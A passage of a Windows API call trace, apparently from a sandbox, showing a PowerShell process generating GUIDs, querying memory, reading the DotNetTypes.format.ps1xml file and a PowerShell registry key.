	[0160.652] VirtualQuery (in: lpAddress=0x14d030, lpBuffer=0x14e030, dwLength=0x1c | out: lpBuffer=0x14e030*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.656] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xc4f9a80f, Data2=0x86d6, Data3=0x42c2, Data4=([0]=0x9f, [1]=0x28, [2]=0xf8, [3]=0x11, [4]=0x10, [5]=0x24, [6]=0xab, [7]=0xbd))) returned 0x0
	[0160.657] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x4e07b33f, Data2=0x590, Data3=0x40c4, Data4=([0]=0x98, [1]=0x2a, [2]=0x82, [3]=0xf2, [4]=0xfd, [5]=0x11, [6]=0xf, [7]=0xde))) returned 0x0
	[0160.657] VirtualQuery (in: lpAddress=0x14d0a8, lpBuffer=0x14e0a8, dwLength=0x1c | out: lpBuffer=0x14e0a8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.658] VirtualQuery (in: lpAddress=0x14d0a8, lpBuffer=0x14e0a8, dwLength=0x1c | out: lpBuffer=0x14e0a8*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.658] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x179611bc, Data2=0x7316, Data3=0x4920, Data4=([0]=0x95, [1]=0x68, [2]=0x3, [3]=0x98, [4]=0x62, [5]=0x8a, [6]=0xf6, [7]=0xa9))) returned 0x0
	[0160.667] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xfcf54a2f, Data2=0x54d2, Data3=0x4761, Data4=([0]=0x8f, [1]=0x81, [2]=0x8c, [3]=0x5a, [4]=0xc5, [5]=0x79, [6]=0xe7, [7]=0x88))) returned 0x0
	[0160.667] VirtualQuery (in: lpAddress=0x14d1d4, lpBuffer=0x14e1d4, dwLength=0x1c | out: lpBuffer=0x14e1d4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.668] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.668] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.668] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xb2252c7f, Data2=0x8a6f, Data3=0x4b9b, Data4=([0]=0xbe, [1]=0xd0, [2]=0x6e, [3]=0x45, [4]=0xb0, [5]=0xa9, [6]=0xc4, [7]=0xbd))) returned 0x0
	[0160.668] VirtualQuery (in: lpAddress=0x14d1d4, lpBuffer=0x14e1d4, dwLength=0x1c | out: lpBuffer=0x14e1d4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.668] VirtualQuery (in: lpAddress=0x14d0ec, lpBuffer=0x14e0ec, dwLength=0x1c | out: lpBuffer=0x14e0ec*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.669] VirtualQuery (in: lpAddress=0x14cda0, lpBuffer=0x14dda0, dwLength=0x1c | out: lpBuffer=0x14dda0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.670] VirtualQuery (in: lpAddress=0x14cda0, lpBuffer=0x14dda0, dwLength=0x1c | out: lpBuffer=0x14dda0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.670] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xb79a81a2, Data2=0x1442, Data3=0x4b82, Data4=([0]=0xa2, [1]=0xe1, [2]=0xb4, [3]=0xc1, [4]=0xf6, [5]=0x90, [6]=0x82, [7]=0xb2))) returned 0x0
	[0160.670] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x2ea9fa2a, Data2=0x43d4, Data3=0x41ca, Data4=([0]=0xa5, [1]=0x20, [2]=0xcd, [3]=0xbf, [4]=0xc0, [5]=0xc0, [6]=0x5f, [7]=0x8d))) returned 0x0
	[0160.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ddec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.670] GetLastError () returned 0x57
	[0160.670] SetErrorMode (uMode=0x1) returned 0x1
	[0160.670] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x34c
	[0160.671] GetLastError () returned 0x0
	[0160.671] GetFileType (hFile=0x34c) returned 0x1
	[0160.671] SetErrorMode (uMode=0x1) returned 0x1
	[0160.671] GetFileType (hFile=0x34c) returned 0x1
	[0160.671] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.673] GetLastError () returned 0x0
	[0160.673] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.674] GetLastError () returned 0x0
	[0160.675] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.675] GetLastError () returned 0x0
	[0160.675] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.675] GetLastError () returned 0x0
	[0160.675] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.675] GetLastError () returned 0x0
	[0160.675] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.675] GetLastError () returned 0x0
	[0160.675] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.675] GetLastError () returned 0x0
	[0160.675] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.676] GetLastError () returned 0x0
	[0160.677] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.677] GetLastError () returned 0x0
	[0160.678] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.678] GetLastError () returned 0x0
	[0160.678] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.678] GetLastError () returned 0x0
	[0160.678] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.678] GetLastError () returned 0x0
	[0160.678] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.678] GetLastError () returned 0x0
	[0160.679] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.679] GetLastError () returned 0x0
	[0160.679] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.679] GetLastError () returned 0x0
	[0160.679] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.679] GetLastError () returned 0x0
	[0160.683] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x1000, lpOverlapped=0x0) returned 1
	[0160.683] GetLastError () returned 0x0
	[0160.683] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0xbce, lpOverlapped=0x0) returned 1
	[0160.683] GetLastError () returned 0x0
	[0160.683] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6b19e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6b19e*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0160.683] GetLastError () returned 0x0
	[0160.683] ReadFile (in: hFile=0x34c, lpBuffer=0x2d6ba30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e354, lpOverlapped=0x0 | out: lpBuffer=0x2d6ba30*, lpNumberOfBytesRead=0x14e354*=0x0, lpOverlapped=0x0) returned 1
	[0160.683] GetLastError () returned 0x0
	[0160.684] CloseHandle (hObject=0x34c) returned 1
	[0160.684] GetLastError () returned 0x0
	[0160.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.684] GetLastError () returned 0x0
	[0160.684] SetErrorMode (uMode=0x1) returned 0x1
	[0160.684] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2d8ca2c | out: lpFileInformation=0x2d8ca2c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0160.684] GetLastError () returned 0x0
	[0160.684] SetErrorMode (uMode=0x1) returned 0x1
	[0160.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.684] GetLastError () returned 0x0
	[0160.684] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e2d8 | out: phkResult=0x14e2d8*=0x34c) returned 0x0
	[0160.685] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x0, lpcbData=0x14e31c*=0x0 | out: lpType=0x14e320*=0x1, lpData=0x0, lpcbData=0x14e31c*=0x56) returned 0x0
	[0160.685] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e320, lpData=0x721bd8, lpcbData=0x14e31c*=0x56 | out: lpType=0x14e320*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x14e31c*=0x56) returned 0x0
	[0160.685] RegCloseKey (hKey=0x34c) returned 0x0
	[0160.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.685] GetLastError () returned 0x0
	[0160.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14de14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.685] GetLastError () returned 0x0
	[0160.686] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x596f81a6, Data2=0x186e, Data3=0x4fab, Data4=([0]=0x8c, [1]=0xc6, [2]=0x75, [3]=0xbe, [4]=0xdb, [5]=0x75, [6]=0x1b, [7]=0x37))) returned 0x0
	[0160.686] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xf7af85ae, Data2=0x3c1c, Data3=0x40a1, Data4=([0]=0xae, [1]=0xd9, [2]=0x87, [3]=0x7f, [4]=0x51, [5]=0x27, [6]=0xea, [7]=0xcc))) returned 0x0
	[0160.687] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xea608457, Data2=0xe28, Data3=0x4c97, Data4=([0]=0x82, [1]=0xa5, [2]=0x4, [3]=0x1f, [4]=0x15, [5]=0x28, [6]=0xd3, [7]=0x35))) returned 0x0
	[0160.687] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xd19edb7, Data2=0x23af, Data3=0x4b51, Data4=([0]=0x9c, [1]=0x6e, [2]=0x59, [3]=0xb, [4]=0x3e, [5]=0x8a, [6]=0x4c, [7]=0xd5))) returned 0x0
	[0160.687] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x3464eba1, Data2=0x1e8, Data3=0x4e7a, Data4=([0]=0xab, [1]=0x75, [2]=0x7a, [3]=0xac, [4]=0x5, [5]=0xf6, [6]=0x6f, [7]=0x75))) returned 0x0
	[0160.687] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x3cdbd1d3, Data2=0x3dd1, Data3=0x47af, Data4=([0]=0x94, [1]=0x8, [2]=0x64, [3]=0x68, [4]=0x39, [5]=0xc4, [6]=0xe2, [7]=0x89))) returned 0x0
	[0160.687] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.687] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x3fcabd17, Data2=0x50b, Data3=0x4ce2, Data4=([0]=0x85, [1]=0xe8, [2]=0x37, [3]=0x1e, [4]=0xd9, [5]=0x73, [6]=0x8a, [7]=0x77))) returned 0x0
	[0160.687] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.687] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.688] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xc59ae7d5, Data2=0x3874, Data3=0x4d76, Data4=([0]=0x9b, [1]=0xda, [2]=0xf6, [3]=0x42, [4]=0x76, [5]=0xb3, [6]=0x7b, [7]=0x8f))) returned 0x0
	[0160.688] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xf37f1888, Data2=0x97d6, Data3=0x43a9, Data4=([0]=0xac, [1]=0xdc, [2]=0x16, [3]=0xe8, [4]=0xc7, [5]=0xe5, [6]=0xb7, [7]=0xd8))) returned 0x0
	[0160.688] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x36028bed, Data2=0xed78, Data3=0x4981, Data4=([0]=0x9a, [1]=0xc7, [2]=0xff, [3]=0x8c, [4]=0x37, [5]=0x70, [6]=0x51, [7]=0xb8))) returned 0x0
	[0160.688] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x356fbfb1, Data2=0xed05, Data3=0x46eb, Data4=([0]=0x84, [1]=0x7, [2]=0x5e, [3]=0x89, [4]=0xef, [5]=0x2d, [6]=0x33, [7]=0xd2))) returned 0x0
	[0160.688] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.688] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x92ea99d2, Data2=0x1fb9, Data3=0x4bbd, Data4=([0]=0xaa, [1]=0xe9, [2]=0x4, [3]=0x8, [4]=0xd8, [5]=0xde, [6]=0xa, [7]=0xd5))) returned 0x0
	[0160.688] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.689] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.689] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.689] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.690] VirtualQuery (in: lpAddress=0x14d080, lpBuffer=0x14e080, dwLength=0x1c | out: lpBuffer=0x14e080*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.690] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x5a5000cd, Data2=0xcb3b, Data3=0x4173, Data4=([0]=0xbc, [1]=0x70, [2]=0x2b, [3]=0x62, [4]=0x9f, [5]=0x62, [6]=0xa2, [7]=0x19))) returned 0x0
	[0160.690] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xe22808a1, Data2=0xed50, Data3=0x47bc, Data4=([0]=0xa3, [1]=0xeb, [2]=0xc4, [3]=0xad, [4]=0x8b, [5]=0x98, [6]=0xe3, [7]=0x7f))) returned 0x0
	[0160.690] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xdeea33ed, Data2=0xf50d, Data3=0x4479, Data4=([0]=0xab, [1]=0xb2, [2]=0x81, [3]=0x35, [4]=0x41, [5]=0xd4, [6]=0x14, [7]=0xb0))) returned 0x0
	[0160.691] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xcdfc1672, Data2=0x718d, Data3=0x44f9, Data4=([0]=0x86, [1]=0x9c, [2]=0x67, [3]=0x19, [4]=0x83, [5]=0x4d, [6]=0xb3, [7]=0x92))) returned 0x0
	[0160.691] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xdbde8b07, Data2=0x25d5, Data3=0x48f0, Data4=([0]=0x80, [1]=0x4c, [2]=0xf2, [3]=0xbf, [4]=0xf5, [5]=0xab, [6]=0x51, [7]=0x3e))) returned 0x0
	[0160.691] VirtualQuery (in: lpAddress=0x14d1d4, lpBuffer=0x14e1d4, dwLength=0x1c | out: lpBuffer=0x14e1d4*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0160.691] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xb0bdbffc, Data2=0xb716, Data3=0x4bed, Data4=([0]=0xa0, [1]=0xf1, [2]=0x3d, [3]=0x7, [4]=0xda, [5]=0x49, [6]=0x32, [7]=0x78))) returned 0x0
	[0160.691] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xc26e81d2, Data2=0xdca4, Data3=0x49b4, Data4=([0]=0x97, [1]=0xfd, [2]=0x2c, [3]=0xf9, [4]=0x61, [5]=0xd, [6]=0x7a, [7]=0xa3))) returned 0x0
	[0160.691] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x88bac337, Data2=0x8e77, Data3=0x4679, Data4=([0]=0x98, [1]=0x21, [2]=0x60, [3]=0xbb, [4]=0xf0, [5]=0xf0, [6]=0x6, [7]=0xaa))) returned 0x0
	[0160.691] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x5f9acd4d, Data2=0xb797, Data3=0x4366, Data4=([0]=0xa0, [1]=0xb7, [2]=0x48, [3]=0x6d, [4]=0xa5, [5]=0x39, [6]=0xf, [7]=0xfb))) returned 0x0
	[0160.692] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xb3f4de17, Data2=0xac7a, Data3=0x452a, Data4=([0]=0x97, [1]=0x23, [2]=0x4d, [3]=0x7e, [4]=0x42, [5]=0xbe, [6]=0xd5, [7]=0x5e))) returned 0x0
	[0160.692] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xf05e2356, Data2=0xaf27, Data3=0x472b, Data4=([0]=0x99, [1]=0x92, [2]=0x7c, [3]=0xf5, [4]=0x31, [5]=0xb0, [6]=0x7f, [7]=0xa2))) returned 0x0
	[0160.692] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x5958c570, Data2=0xcdbd, Data3=0x4f6f, Data4=([0]=0x89, [1]=0x67, [2]=0xcb, [3]=0xcf, [4]=0xb4, [5]=0x5d, [6]=0xc, [7]=0x27))) returned 0x0
	[0160.692] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x232c1a5c, Data2=0xfb1b, Data3=0x4ecd, Data4=([0]=0xad, [1]=0x81, [2]=0x94, [3]=0x68, [4]=0x26, [5]=0x7f, [6]=0xda, [7]=0x5f))) returned 0x0
	[0160.692] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x68c04ede, Data2=0x967d, Data3=0x47b0, Data4=([0]=0x85, [1]=0xc5, [2]=0x26, [3]=0xec, [4]=0x25, [5]=0x6, [6]=0xd3, [7]=0xa7))) returned 0x0
	[0160.692] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xad47d029, Data2=0xcdd5, Data3=0x4a1c, Data4=([0]=0xaa, [1]=0x8d, [2]=0x34, [3]=0x21, [4]=0xfc, [5]=0x96, [6]=0x58, [7]=0x6))) returned 0x0
	[0160.692] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x15a8d68d, Data2=0xa45c, Data3=0x46fa, Data4=([0]=0xb2, [1]=0x46, [2]=0xea, [3]=0x70, [4]=0x77, [5]=0xe6, [6]=0x3b, [7]=0x22))) returned 0x0
	[0160.692] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x80183b2f, Data2=0x111d, Data3=0x4ec5, Data4=([0]=0x89, [1]=0x1e, [2]=0x51, [3]=0x1f, [4]=0x52, [5]=0x37, [6]=0x43, [7]=0xf))) returned 0x0
	[0160.693] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x8e00f569, Data2=0xc97c, Data3=0x4b1b, Data4=([0]=0x84, [1]=0xa2, [2]=0x37, [3]=0x79, [4]=0x78, [5]=0x85, [6]=0x7, [7]=0x0))) returned 0x0
	[0160.693] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x94e2f4fc, Data2=0x7655, Data3=0x478e, Data4=([0]=0x89, [1]=0x53, [2]=0xb9, [3]=0x88, [4]=0x74, [5]=0xc0, [6]=0xaf, [7]=0x1e))) returned 0x0
	[0160.693] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x51ed661, Data2=0xd73d, Data3=0x4515, Data4=([0]=0x94, [1]=0x0, [2]=0x5d, [3]=0x81, [4]=0xcc, [5]=0x62, [6]=0xd2, [7]=0xc7))) returned 0x0
	[0160.693] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x8f612ba7, Data2=0xc31d, Data3=0x4c33, Data4=([0]=0xb1, [1]=0xc1, [2]=0x7e, [3]=0x73, [4]=0xd3, [5]=0xc4, [6]=0x9e, [7]=0xd4))) returned 0x0
